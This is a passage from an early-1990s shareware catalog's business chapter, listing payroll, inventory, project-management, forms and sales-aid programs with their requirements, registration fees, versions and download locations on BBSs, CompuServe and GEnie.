description on page 199. + + Chapter 8, "Business" 212 + + + + Product: ZPAY 3 + Needs: IBM PC, DOS 2.0 or better. 375k RAM, hard disk, printer. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $69.95 + Registration benefits: Printed manual, master disks, one year + mail support, 900# phone support. + Version: 3.4 (01-12-92) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: ZPAY3*.ZIP (multiple files) on BBSs; ZPAY3*.ZIP in + IBMAPP forum LIB 5 (multiple files) on CompuServe; ZPAY3*.ZIP + in IBMPC RTC LIB 0 (multiple files) on GEnie. + Download size: 604k + Special instructions: Product distribution restricted to the + United States. + Description: + The easiest to use and most flexible payroll package for the PC + ever! Pays salaried, hourly, commissioned, 1099 type payments + by any pay period. Prints checks, W2's and a multitude of + reports. Has data exporting so you can manipulate the data + with other applications such as a spreadsheet program. Supports + laser printers as well as your pin feed printers. Manual has a + "test ride" tutorial to make learning a snap! + + + 8.2 Inventory systems + + Product: DAYO BAR CODE 3 OF 9 + Needs: IBM PC, DOS 3.3 or better. 450k RAM; Hard Disk; DAYO + Inventory. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed and disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed and + disk), Phone Support. + Look for: DAYO39.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYO39.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 300k + Description: + Prints 3 of 9 bar codes with an Epson (tm) or IBM (tm) + compatible dot matrix printer. It is integrated with the DAYO + Inventory and the DAYO Customer databases. Labels are printed + onto standard labels (3.5 by 15/16 inches at 6 lines per inch). + The inventory bar code label consists of an item number, its + bar code, vendor item number, description, unit of issue, + weight, and bin/location. The customer bar code label consists + of a customer number, its bar code, customer's name and + telephone. + + Chapter 8, "Business" 213 + + + + Product: DAYO END OF PERIOD + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk; DAYO + Inventory. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-24-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOEE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOEE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOEE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 320k + Description: + Contains routines that are normally run at the end of a + reporting period (ie: Month). Permits you to permanently remove + deleted records from the Accounts Receivable (AR) and Accounts + Payable (AP) databases, and to erase old report text files. + There is also a routine for performing a Physical Inventory. + Many reports are included (ie: AR Ageing, AP Summary, Inventory + Movement). + + Product: DAYO INVENTORY + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $65.00 + Registration benefits: Multiuser, No record limits, Manual + (printed and disk), Phone Support. + Version: 3.1 (06-27-91) + User benefits: Multiuser, No record limits, Manual (printed and + disk), Phone Support. + Look for: DAYOIE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOIE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOIE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 280k + Description: + A Multiuser Inventory Control, Purchasing, and Vendor + Maintenance application. Use it to create and maintain an + inventory of any product. Features include Multiuser (ie: + Novell, LANtastic), Reports, Labels, Lists, and a Graph. The + ability to upgrade and expand your system is available with the + addition of supporting DAYO products (ie: DAYO POS, DAYO AR, + DAYO AP, etc.). + + Chapter 8, "Business" 214 + + + + Product: DAYO MRP + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $75.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed or disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed or + disk), Phone Support. + Look for: DAYOWE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYOWE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe. + Download size: 340k + Description: + A routine designed for manufacturers. Builds items (End Items) + from item (Components) in the inventory database. End Items can + later be placed into inventory for later sales. Supports multi- + level Bill of Materials. Features include automatic inventory + posting and creation of inventory adjustment records, databases + are dBASE(tm) compatible, multiuser, and many reports. + + Product: DAYO RETURN MANAGEMENT SYSTEM + Needs: IBM PC, DOS 3.3 or better. 520K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $45.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 2.0 (05-01-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOFE.EXE on BBSs (call 407-292-4921 to download it at + no charge). + Download size: 320k + Description: + Provide the means to record and track returns of your product. + DAYO RMS integrates to DAYO Inventory and its multiple + warehouses to allow tracking of items being returned (ie: + breakages, warranties, return to vendors). Creates RMA numbers. + + Product: Household Register + Home/Office inventory program. See full description on + page 351. + + Chapter 8, "Business" 215 + + + + Product: ICP + Needs: IBM PC, DOS 3.3 or better. + Author: Spirit7 Software, Ltd., 703-943-4635 + Registration: $35.00 + Registration benefits: Master disks, unlimited phone/fax support, + utilities. + Version: 7.0 (02-01-92) + User benefits: Master disks, unlimited phone/fax support, + utilities. + Look for: ICP.ZIP on BBSs; ICP70.ZIP in IBMAPP forum LIB 6 on + CompuServe. + Download size: 225k + Description: + A full-featured, general purpose inventory control system with + modules to sell, order, and receive inventory. The system + features complex filtering (segmenting) of the data base by + using the "and/or" logical operators. Records can be quickly + located by the item number, description, vendor, manufacturer + or by browsing the data basae or a restricted segment. New + records are easily added using "record pattern templates". Many + usefull reports are available. + + Product: Layout + Needs: IBM PC, DOS 2.0 or better. CGA monitor; IBM/Epson FX or + HP LaserJet printer. + Author: Software Co-op, 317-856-6052 + Registration: $35.00 + Registration benefits: Printed manual, BBS/phone/mail support, + disk with latest version, notice of upgrades. + Version: 2.0 (06-01-91) + User benefits: Printed manual, BBS/phone/mail support, disk with + latest version, notice of upgrades. + Look for: LAYOUT.ZIP on BBSs (call 317-856-2087 to download it at + no charge); LAYOUT.ZIP in IBMAPP forum LIB 5 on CompuServe. + Download size: 140k + Description: + Keeps graphics layout of office furniture and equipment by room + and a database objects, each with 6 free-form fields. Multiple + rooms can be grouped together to form units such as + departmental charge areas. + + Inventory reports and export of data to comma-delimited files + for transfer to database programs or spreadsheets. Data entry + is via a mini-CAD system. Makes nice printed room layouts. + Solid system without a lot of frills. Appeals to the office + manager with rolled up sleeves. + + Chapter 8, "Business" 216 + + + + Product: The Retailer + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: RetailWare, 405-749-1763 + Registration: $49.00 + Registration benefits: Current disk set sent with printed manual. + Version: 4.05 (12-19-91) + User benefits: Current disk set sent with printed manual. + Look for: RET405.ZIP on BBSs (call 405-755-7047 to download it at + no charge); RET405.ZIP in IMBAPP forum LIB 6 on CompuServe. + Download size: 280k + Description: + Inventory control for merchants with up to 5 stores selling + similar products. Menu and on-line help. Not POS, but + "backroom" system for central buying office. Min/Max stock + levels may be recalculated automatically. Multiple vendors: up + to 10,000 items each. Input sales from sales slips or physical + inventory in an order-form or on-the-shelf sequence you define. + Identifies best sellers. Five year monthly sales history, by + item & store. Bar charts. Printer redirection. Prints price + tags. Tutorial. + + + 8.3 Equipment use & maintenance + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 381. + + + 8.4 Project bidding & costing + + Product: ProDev*EPRICE [***] + Needs: IBM PC, DOS 2.0 or better. ProDev*QUOTE software. Up to + 24MB of hard disk for large data files. + Author: Pro Dev Software, 616-788-2243 + Registration: $35.00 + Registration benefits: One year of support. + Version: 4.10 (05-01-91) + User benefits: One year of support. + Look for: availability unknown on BBSs; PDQUT3.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 245k + Description: + Provides for converting weekly price service data files for + electrical, heating, plumbing and air conditioning items to the + ProDev*QUOTE file format to automatically update material + prices. Includes sample files for 3 USA, 1 Australian and 1 UK + price service. The user subscribes separately to the desired + price service. + + Chapter 8, "Business" 217 + + + + Product: ProDev*QUOTE [***] + Needs: IBM PC, DOS 2.0 or better. Hard disk recommended. + Author: Pro Dev Software, 616-788-2243 + Registration: $45.00 + Registration benefits: One year of support. + Version: 4.10p (05-01-91) + User benefits: One year of support. + Look for: availability unknown on BBSs; PDQUT1.EXE in IBMAPP + forum LIB 15 (multiple files) on CompuServe. + Download size: 320k + Description: + Packed with features for ANY type/size business from + consultants to 1 person contractors to small/large + manufacturers. Used by many electrical, heating, plumbing, + remodeling, major construction contractors, florists, flooring + stores, landscape contractors, printing shops, maintenance + services, well . . . just about any type business. The system + defaults are highly configurable. Pull-Down menus, Point & + Shoot Browse and F1 Help windows. + + Product: ProDev*QUOTE Utility Programs [***] + Needs: IBM PC, DOS 2.0 or better. ProDev*QUOTE software. Hard + disk recommended. + Author: Pro Dev Software, 616-788-2243 + Registration: $30.00 + Registration benefits: One year of support. + Version: 4.10p (05-01-91) + User benefits: One year of support. + Look for: availability unknown on BBSs; PDQUT2.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 306k + Description: + Browse program to quickly browse and edit all ProDev*QUOTE bid + system data files. Tracking program will freeze bid prices and + allow posting and comparison reporting of actual project costs. + These are add-on programs to the ProDev*QUOTE program. + + Product: TimeTrac + Needs: IBM PC, DOS 3.0 or better. + Author: Compass / New England, 603-431 8030 + Registration: $50.00 + Registration benefits: Printed manual, most recent version, + phone/mail/CIS support. + Version: 91f (06-01-91) + User benefits: Printed manual, most recent version, phone/mail/ + CIS support. + Look for: TT91F.* on BBSs (call 603-433 1859 to download it at no + charge); TT91F.EXE in IBMAPP forum LIB 6 on CompuServe; + TT91F.LZH in IBMPC RTC LIB 3 on GEnie. + Download size: 162k + Description: + Automates time sheets and aids project tracking & billing. + Allows individuals in a workgroup to track their use of time + while in the field on laptop computers and then export the + + Chapter 8, "Business" 218 + + + + information to accounting, project tracking, spreadsheet and + database programs. Includes an optional (6k) TSR that allows + users to "pop" a timesheet over text or graphics programs to + keep track of actual time used. TimeTrac works equally well at + the office on a Local Area Network. + + 8.4.1 Decision analysis tools + + Product: NEWBIZ + Brainstorming Program to set up own business. See full + description on page 142. + + Product: UDECIDE + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Registration benefits: Phone/CompuServe support. + Version: 1.05 (04-20-91) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; UDCIDE.ZIP in IBMAPP + forum LIB 7 on CompuServe. + Download size: 100k + Description: + Helps you make decisions such as which software or hardware to + purchase; ratings surveys; which project to pursue; selecting + colleges, movies, stocks, or wines. You enter a list of + elements to evaluate the contenders, giving each a weight. Then + you enter the options, assigning values to each element. Then + sort to obtain an ordered list of the best options. Or perform + what-if analyses by changing elements or weights. + + + 8.5 Project management + + Product: Business Plan Master (IBM) + Needs: IBM PC, DOS 3.0 or better. Word Processing or Page Layout + program plus a Lotus or compatible spreadsheet program. + Author: Grand Universal, 303-756-2175 + Registration: $34.00 + Registration benefits: Most recent version, minimum three months + support via online services, one free upgrade. + Version: 1.2 (03-21-92) + User benefits: Most recent version, minimum three months support + via online services, one free upgrade. + Look for: availability unknown on BBSs; BIZPLA.ZIP in USEN forum + LIB 12 on CompuServe; BIZPLANM.ZIP in HOSB RTC LIB 5 on GEnie. + Download size: 152k + Description: + Every business needs a BUSINESS PLAN - Fortune 500 or Mom & + Pop. Business Plan Master makes it easy for you to write a + complete business plan. Most of the work is already done for + you. Select the text you want from these formatted templates. + Enter your projections and the spreadsheets generate full + + Chapter 8, "Business" 219 + + + + financial reports and analysis (income statement, balance + sheet, cash flow, ratios, etc.). + + Save days of work and have a comprehensive business plan to + chart your company's growth! + + Product: Business Plan Master (Mac) + Needs: Unknown. Needs Macintosh word processing or page layout + program plus a spreadsheet program. + Author: Grand Universal, 303-756-2175 + Registration: $34.00 + Registration benefits: Disk with most recent version, minimum + three months support via the online services, one free upgrade. + Version: 1.2 (03-25-92) + User benefits: Disk with most recent version, minimum three + months support via the online services, one free upgrade. + Look for: availability unknown on BBSs; BIZPLA.SIT in USEN forum + LIB 12 on CompuServe; BIZPLANM.SIT in HOSB RTC LIB 5 on GEnie. + Download size: 230k + Description: + Every business needs a BUSINESS PLAN - Fortune 500 or Mom & + Pop. Business Plan Master makes it easy for you to write a + complete business plan. Most of the work is already done for + you. Select the text you want from these formatted templates. + Enter your projections and the spreadsheets generate full + financial reports and analysis (income statement, balance + sheet, cash flow, ratios, etc.). + + Save days of work and ahve a comprehensive business plan to + chart your company's growth! + + Product: Calendar Keeper + Calendar Database/Draw Program. See full description on + page 83. + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 381. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 84. + + Chapter 8, "Business" 220 + + + + Product: Easy Project + Needs: IBM PC, DOS 3.3 or better. 512k RAM; hard disk. + Author: Parcell Software, 708-232-6328 + Registration: $59.00 + Registration benefits: Latest version sent with printed manual. + Special BBS access given and all registered users notified of + updates. + Version: 4.02 (05-01-91) + User benefits: Latest version sent with printed manual. Special + BBS access given and all registered users notified of updates. + Look for: EZPROJ.EXE on BBSs (call 708-232-6339 to download it at + no charge); EZPROJ.EXE in IBMAPP forum LIB 6 on CompuServe. + Download size: 180k + Description: + A tool to manage all types of projects and an alternative to + complex and expensive project management systems. Featues + Gantt charts detailing planned vs. actual progress, extensive + reporting, and automatic scheduling. Multiple date formats are + supported for use by managers all over the world. Utilizes .DBF + files to make data transfer to other programs easy. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 114. + + Product: Task Master [***] + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: RKS Software, Inc., 703-534-1726 + Registration: $39.00 + Registration benefits: Master disks, unlimited phone/fax/ + CompuServe/mail support, upgrade discounts. + Version: 2.3 (04-27-92) + User benefits: Master disks, unlimited phone/fax/CompuServe/mail + support, upgrade discounts. + Look for: TMASTE.ZIP on BBSs (call 617-354-8873 to download it at + no charge); TMASTE.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 262k + Description: + This all-purpose project tracking system is ideal for keeping + track of office assignments, correspondence, projects, tasks, + and other work - easily. Super Report Writer. Powerful Query + Builder allows you to define, save, and restore queries so that + you can work with any subset of records. Form Letter utility + permits merging of data into letters and memos. Popup + appointment calendar. Popup calculator. Supports all laserjet / + dot matrix printers. Supports all international date formats. + + Chapter 8, "Business" 221 + + + + Product: WorkQueue + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Lane Davis + Registration: $40.00 + Registration benefits: Latest version without the 'unlicensed' + message. + Version: 1.9 (12-02-91) + User benefits: Latest version without the 'unlicensed' message. + Look for: availability unknown on BBSs; WQ19*.ZIP in IBMAPP forum + LIB 6 (multiple files) on CompuServe. + Download size: 220k + Special instructions: Product distribution restricted to the + United States. + Description: + Uses a Staff Plan, Work Plan and Holiday Schedule to calculate + a work schedule for up to 25 people and 1000 tasks over two + years. The availability of staff, their skills, types of work + and task dependencies are used to determine start and end dates + as well as durations. It uses easy, full-screen spreadsheet- + style data entry screens and avoids specialized terminology and + concepts. The Operating instructions, User's Guide and Glossary + are on-line and context-sensitive. + + + 8.6 Client management + + Product: DAYO BAR CODE 3 OF 9 + Print 3 of 9 barcodes onto Epson/IBM printer. See full + description on page 212. + + Product: DAYO MEMBERSHIP + Needs: IBM PC, DOS 3.3 or better. 500K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $95.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYODE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYODE.ZIP in IBMAPP forum LIB 9 on CompuServe. + Download size: 320k + Description: + An application designed to track membership for an association + or organization. The ability to maintain records for donations, + dues, payments and/or invoices has also been incorporated into + the package. Use it to record member information and + optionally, maintain a simple accounting system for dues and/or + donations. Many reports and reporting routines are included in + this package, ie: Members List, Notes, Statements, Labels, + Payments, Form Letters and much more. + + Chapter 8, "Business" 222 + + + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 84. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 155. + + Product: FlexBase + Needs: IBM PC, DOS 3.3 or better. Hard disk. 80286 recommended. + Author: National MicroSystems, 416-599-1228 + Registration: $49.95 + Registration benefits: Printed manual, unlimited phone support. + Version: 1.0 (11-20-91) + User benefits: Printed manual, unlimited phone support. + Look for: availability unknown on BBSs; FB.ZIP in IBMAPP forum + LIB 3 on CompuServe. + Download size: 170k + Description: + An easy to use database system for recording information about + people. You define what fields you want and the layout of the + screen. The program then integrates it all automatically. + + Once you have added your people, you can filter them to show + only the ones you want. Now create custom reports, letters, + and labels using our built in editor and lookup-tables. Print + them out or save the templates for later use. No system has + ever been so easy to use, with so many advenced features. + + Product: Hotnet + The Help Desk Solution. See full description on page 182. + + Product: Japanese Business Culture + Japanese Business Culture Kit. See full description on + page 231. + + Product: Label Master [***] + PC Magazine Editors Choice mailing list prog. See full + description on page 159. + + Product: NAMEBASE + Needs: IBM PC, DOS 2.1 or better. + Author: Elk Creek Software, 303-838-5796 + Registration: $25.00 + Registration benefits: Printed manual, master disks. + Version: 3.1 (03-26-92) + User benefits: Printed manual, master disks. + Look for: NAME30.ZIP on BBSs; NAME31.ZIP in IBMSYS forum LIB 7 on + CompuServe. + Download size: 170k + Description: + Keeps track of people and companies. Stores 4 phone numbers, 2 + addresses, 2 dates, and up to 2000 characters of notes for each + record. Full mouse support. Prints a pocket-size address + + Chapter 8, "Business" 223 + + + + book, labels, Rolodex cards, and reports. Creates mail-merge + files for use with most word processors. Dials the phone. + Displays multiple records at once. Extremely easy to use. Type + the first few characters of any person's name and you are + immediately viewing all information about that person. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 93. + + Product: Service Business Design + Needs: IBM PC, DOS 3.3 or better. VGA monitor. Mouse + recommended. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Registration benefits: Mail support. + Version: 1.1 (03-23-92) + User benefits: Mail support. + Look for: WORK.ZIP on BBSs (call 714-636-2667 to download it at + no charge). + Download size: 200k + Description: + Use this program to score your organization's performance in + the service sector. Find out mistakes commonly made in service + delivery; inspire your staff with service philosophies of + famous people; design better service delivery to retain + personnel and boost profits. Customize the lessons by altering + the scrolled text files. This electronic lecture reads like a + magazine with selections determined by menu. Features + animation,graphics,music. + + Product: Systems Manager + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: MiCord, 517-631-4367 + Registration: $10.00 + Registration benefits: Master disks, free support, upgrade + discounts. + Version: 2.5 (02-10-91) + User benefits: Master disks, free support, upgrade discounts. + Look for: SYSMGX.EXE on BBSs; SYSMGX.EXE in IBMAPP forum LIB 7 on + CompuServe. + Download size: 135k + Description: + Automatically tracks usage by time, date, client, purpose, user + and software type from an integrated point-and-shoot menu for + your software or DOS commands. Sorted reports prepared + automatically for client billing, tax or business records. + Friendly enough for beginners with the capabilities advanced + users want. Features include user selection of all tracking + options, password protection, screen colors, screen title, and + time/date formats. + + Chapter 8, "Business" 224 + + + + 8.7 Specific-field systems + + 8.7.1 Medical & dental + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 281. + + Product: LEANER + Needs: IBM PC, DOS 2.0 or better. Hard disk and EGA monitor + recommended. + Author: MoonStone Software, 602-955-4266 + Registration: $35.00 + Registration benefits: Printed manual, master disks, phone/mail/ + BBS/newsletter support. Discount offers. + Version: 1.52 (10-10-91) + User benefits: Printed manual, master disks, phone/mail/BBS/ + newsletter support. Discount offers. + Look for: LEAN152.EXE on BBSs (call 602-235-9653 to download it + at no charge); LEAN15.EXE in GOODHEALTH forum LIB 10 on + CompuServe; LEAN101.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 240k + Description: + For health organizations, weight control clinics and corporate + employee programs. Handles multiple groups. Insures privacy + for personal charts. Includes your own weight loss strategies. + + Keep the fat fires burning, give LEANER to your clients for + home use. Graphs, reports, charts and reviews track progress. + Calculates aerobic exercise points. Estimates body fat. + Assesses health risks. Discovers your eating style. A wide + range of techniques to help shape a healthy, leaner lifestyle. + + Product: ORGANIZE! Professional Books + Cataloging system for professional books. See full description + on page 226. + + Chapter 8, "Business" 225 + + + + Product: Tolman Dental Program + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: Peter T. Smith D.D.S., 516-281-5544 + Registration: $599.00 + Registration benefits: Set of data files, at least six months or + six hours of phone support. + Version: 3.1 (03-01-92) + User benefits: Set of data files, at least six months or six + hours of phone support. + Look for: TOLMAN#.ZIP (multiple files) on BBSs; TOLMN*.ZIP in + DBADVISOR forum LIB 8 (multiple files) on CompuServe; + TOLMAN#.ZIP in DATABASE RTC LIB 4 (multiple files) on GEnie. + Download size: 480k + Special instructions: Product distribution restricted to the + United States. + Description: + This CompuServe Magazine (DEC 91) pick as a "Current Hit," is + an efficient management program for a mid-size dental office. + Though inexpensive it is NOT incomplete. It will handle + billing, recalls, insurance, referral tracking, a variety of + patient lists, production reports, mail merge and more. With + online help, look-up windows and a User's Manual, the program + is easy to learn. The program was used/improved in the + dentist/author's office for 4 years before release. + + 8.7.2 Real estate + + Product: ACCEL + Compares various accelerated payment methods. See full + description on page 244. + + Product: DIMANAGE + Needs: IBM PC, DOS 2.0 or better. + Author: DI Management Corporation, 513-831-4122 + Registration: $99.00 + Registration benefits: Printed manual, master disks. + Version: 2.1 (06-14-91) + User benefits: Printed manual, master disks. + Look for: availability unknown on BBSs; DIMANA.EXE in IBMAPP + forum LIB 15 on CompuServe. + Download size: 256k + Special instructions: Product distribution restricted to the + United States. + Description: + A rental property management system designed for speed and ease + of use. Use it to manage as many properties, with as many + units, as your hard disk and your patience will tolerate. The + assumption is that managers want to manage property, not do + accounting. The system was designed to make record keeping as + simple as possible, while giving fast access to the money and + tenant information the property manager and the accountant + need. Sample data provided. + + Chapter 8, "Business" 226 + + + + 8.7.3 Library + + Product: BookBank [***] + Comprehensive program for book collectors. See full + description on page 349. + + Product: ORGANIZE! Professional Books + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: PROBK527.ZIP on BBSs. + Download size: 300k + Description: + A specialized cataloging system designed specifically for + professional books, technical papers and other publications. + Each publication can be cataloged by up to 20 criteria all of + which can be searched, cross referenced, sorted and + alphabetized. Searches can be based on keywords, subjects, + title, author or any other information you've included in your + catalog. Fast BTrieve index based searches can find any entry + in less than 2 seconds. Includes user definable printed + reports. + + Product: ORGANIZE! Your Books/Magazines + Cataloging system for books & magazines. See full description + on page 354. + + Product: ORGANIZE! Your CDs & Records + Cataloging system for CDs, LPs and tapes. See full description + on page 354. + + 8.7.4 Legal & law enforcement + + Product: CHRONOS + Interactive historical timelines. See full description on + page 326. + + + 8.8 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: dPerfect Merge [***] + Converts xBase to Word Perfect secondary file. See full + description on page 38. + + Chapter 8, "Business" 227 + + + + 8.9 Forms generators + + Product: BESTTEST + Full-featured test preparation program. See full description + on page 322. + + Product: FormGen + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $35.00 + Registration benefits: Printed manual, master disks, unlimited + technical support, product discounts. + Version: 4.1a (12-19-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: FORM41A.EXE on BBSs; FORM41.EXE in IBMAPP forum LIB 6 + on CompuServe. + Download size: 107k + Description: + The world's most popular form drawing package. Powerful, yet + easy-to-use package works like a word processor, with many + features specially geared to designing forms. Using the full + screen editor, you can quickly draw lines and boxes. Then print + the form on your Epson, IBM or HP type printer. The printed + results are amazing! Professional quality forms in minutes! + + Product: PCForm + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: CareWare, 916-477-6024 + Registration: $25.00 + Registration benefits: Phone/CompuServe/mail support. + Version: 2.3 (01-25-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; PCF23.EXE in IBMAPP forum + LIB 6 on CompuServe; PCF23.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 143k + Description: + Offers an easy means for creating tailored made professional + looking forms, graphs, and line drawings. Features: ease of + use, word processing like entry and editing, new HP LaserJet + and multiple copies printing, comprehensive file management, + auto-tab for easy fill-in, two point line and box drawing, + block editing, multiple pages, pull down menus, mouse support, + configurability, PIF and ICO files, ASCII format for maximum + compatibility and more. + + Product: PostCardMaster + PostCard & Mail Handling System. See full description on + page 161. + + Chapter 8, "Business" 228 + + + + 8.9.1 Forms fillers + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 54. + + Product: Federal Express Label Printer + Needs: IBM PC, DOS 2.0 or better. + Author: TVSware, 908-774-6402 + Registration: $35.00 + Registration benefits: Disk and printed manual; free unlimited + technical support. + Version: 1.01a (01-11-91) + User benefits: Disk and printed manual; free unlimited technical + support. + Look for: FEDEX101.ZIP on BBSs; FEDEX.EXE in IBMAPP forum LIB 9 + on CompuServe. + Download size: 167k + Description: + Prints FedEx labels. + + Product: FormGen Fill + Needs: IBM PC, DOS 3.2 or better. + Author: FormGen Corp., 416-857-4141 + Registration: $35.00 + Registration benefits: Printed manual, master disks, unlimited + technical support, product discounts. + Version: 1.5 (12-19-90) + User benefits: Printed manual, master disks, unlimited technical + support, product discounts. + Look for: FILL15.EXE on BBSs; FILL15.EXE in IBMAPP forum LIB 6 on + CompuServe. + Download size: 163k + Description: + From the makers of FormGen, the world's most popular form + drawing system, comes a powerful, yet easy-to-use form filling + system. This companion for FormGen puts data areas on your + forms. The form may then be filled & printed - picture perfect + every time. Features: muti-line fields, calculations, date & + time and much more. Context sensitive help makes it easy to + learn and use. Forms are printed on your Epson, IBM, or HP + printer. + + Chapter 8, "Business" 229 + + + + Product: MORFORM + Needs: IBM PC, DOS 2.1 or better. Hard disk, 480k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $39.95 + Registration benefits: Printed manual, phone support, one free + upgrade, 50 additional business and miscellaneous forms. + Version: 1.0 (03-01-91) + User benefits: Printed manual, phone support, one free upgrade, + 50 additional business and miscellaneous forms. + Look for: availability unknown on BBSs; MORFR*.ZIP in IBMAPP + forum LIB 6 (multiple files) on CompuServe; MORFORM*.ZIP in + IBMPC RTC LIB 3 (multiple files) on GEnie. + Download size: 500k + Description: + Save time and money every day with this complete forms + management system. Create customized forms quickly and easily + with automatic box and line drawing. Fill them out with full + data entry capabilities including automatic computations, + multiple choice selections, customized field help, automatic + date and time stamping, incremental numbering, and each form + may be 1 to 30 pages in length. Then print them using all of + the fonts available on your printer for a professional look. + + Product: STAFF-MASK + Custom designed RETRIEVE/EDIT/ADD/DELETE Mask. See full + description on page 152. + + 8.9.2 Forms processing + + Product: MORFORM + Complete forms management system. See full description on + page 228. + + Product: Over_LAZ + HP LaserJet overlays and letterheads. See full description on + page 59. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 61. + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 153. + + Product: XPENS + Expense Account Reporting Program. See full description on + page 200. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 154. + + Chapter 8, "Business" 230 + + + + 8.9.3 Forms collections + + Product: FormGen Business Collection + Needs: Unknown. FormGen. + Author: FormGen Corp., 416-857-4141 + Registration: $0.00 + Registration benefits: Technical support. + Version: 1.0 (07-23-90) + User benefits: Technical support. + Look for: availability unknown on BBSs; FORM-B.EXE in IBMAPP + forum LIB 6 on CompuServe. + Download size: 44k + Description: + Contains over 70 common business forms for use with FormGen. + Invoices, purchase orders, time sheets and much more! Nearly + any form you can think of for business can be found in this + collection. You can add your company name, make any changes + you want, and your form is ready. + + Product: FormGen Home Collection + Needs: Unknown. FormGen. + Author: FormGen Corp., 416-857-4141 + Registration: $0.00 + Registration benefits: Technical support. + Version: 1.0 (07-23-90) + User benefits: Technical support. + Look for: availability unknown on BBSs; FORM-H.EXE in IBMAPP + forum LIB 6 on CompuServe. + Download size: 33k + Description: + Contains over 50 useful forms for home an hobby. Everything + from golf and bowling scoresheets to grocery lists and movie + logs can be found in this collection. Use the forms "as is", or + change them to suit your taste. + + + 8.10 Sales aids + + Product: CATALOG-ON-A-DISK + Needs: IBM PC, DOS 2.1 or better. + Author: EmmaSoft, 607-533-4685 + Registration: $55.00 + Registration benefits: Printed manual, master disks, support. + Version: 2.00 (03-15-92) + User benefits: Printed manual, master disks, support. + Look for: CATALG30.ZIP on BBSs (call 607-533-7072 to download it + at no charge); CATALG.ZIP in ZNT:UTILFOR forum LIB 8 on + CompuServe. + Download size: 195k + Description: + Just what you need to distribute your product catalog to + computer-using customers! Your customers will love how easy it + is to find products they want with the press of a few keys. AND + they can order them right in the program: it prints out the + + Chapter 8, "Business" 231 + + + + order form, too! Your special message (Company Name, Phone, + Address) appears at the top of the screen and order form. + + Product: DAYO PRICE BOOK + Needs: IBM PC, DOS 3.3 or better. 530K RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: 